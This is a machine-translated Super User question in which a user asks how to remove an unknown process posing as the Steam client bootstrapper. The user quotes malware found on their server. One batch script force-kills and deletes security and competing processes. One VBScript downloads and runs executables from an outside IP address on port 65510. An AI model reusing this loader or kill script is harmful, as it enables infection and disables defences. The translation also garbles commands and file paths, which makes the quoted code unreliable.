aknad - kuidas püsivalt tappa auru kliendi bootstrapper - Super User

Mul on minu ülesannete halduril järgmine olukord:

Ma ei tea, milline rakendus see on, kuid kindlasti ei ole Steam'i kliendi bootstrapper, sest ma ei installinud seda ega saa ka seda eemaldada.

Kui püüan välja selgitada, millist rakendust selle sammu kaudu kasutatakse:

Ma näen midagi sellist:

MS Configi utiliidis ei leidnud ma midagi, mis näeb välja nagu secury.exe.

Kui avan faili asukoha, näen kolme faili:

m.bat, b.exe, 4.vbs.

Allpool on m.bat sisu:

taskkill / f / t / im secury.exe c: Andmed anure.exe tegumik / f / t / im kingsoft.exe tegumik / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe ülesande tegemine / f / t / im SystemSettlngs.exe ülesande tegemine / f / t / im SystemSetting.exe ülesanne / f / t / im Process.exe tegumik / f / t / im winlnlt.exe tegumik / f / t / im WindowsUpgrade.exe ülesanne / f / t / im msdc.exe tegumik / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe f / t / im lqrtqe.exe tegumik / f / t / im apkls.exe tegumik / f / t / im winlog.exe tegumik / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe tegumik / f / t / im fcty.exe ülesanne / f / t / im soiuos.exe ülesanne / f / t / im TrustedInstaller.exe del C: C: Windows Installed TrustedInstaller.exe del C: Programmid Dataoft.exe del C: Andmed expl0rer.exe del C: Programmiandmed iplare.exe del C: Andmed issm.exe del C: ProgramData MSASCui.exe del C: Pro gramm Andmed SystemSettlngs.exe del C: Andmed SystemSetting.exe del C: Andmed Process.exe del C: Andmed winlnlt.exe del C: Andmed WindowsUpgrade.exe del C: Andmed ddc.exe del C: Programm Andmed Fiddlere.exe del C: Andmed dovst.exe del C: Programmadqrtqe.exe del C: Andmed apkls.exe del C: Andmed winlog.exe del C: Andmed svchosts.exe del C: programmdokumendid win1ogins.exe del C: programmdata shovsts.exe del C: programmdata fcty.exe del C: programmdata pool.exe del C: programmdata C: ProgramData base3.exe

Järgmine läheb 4.vbs:

Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Vajuta "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: programmdata2.exe", 2 Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: Andmed pool2.exe", 2 CreateObject ("WScript.Shell"). Käivita "C: Andmete kopeerimine 3.exe" CreateObject ( "WScript.Shell"). Käivita "del C: programmdata pool3exe"

Mida ma saan teha, et peatada secury.exe oma serveri arvutivolituste kuritarvitamisega?

PS Olen täitnud Avasti täieliku kontrolli arvuti üle, kuid see ei leidnud midagi valesti.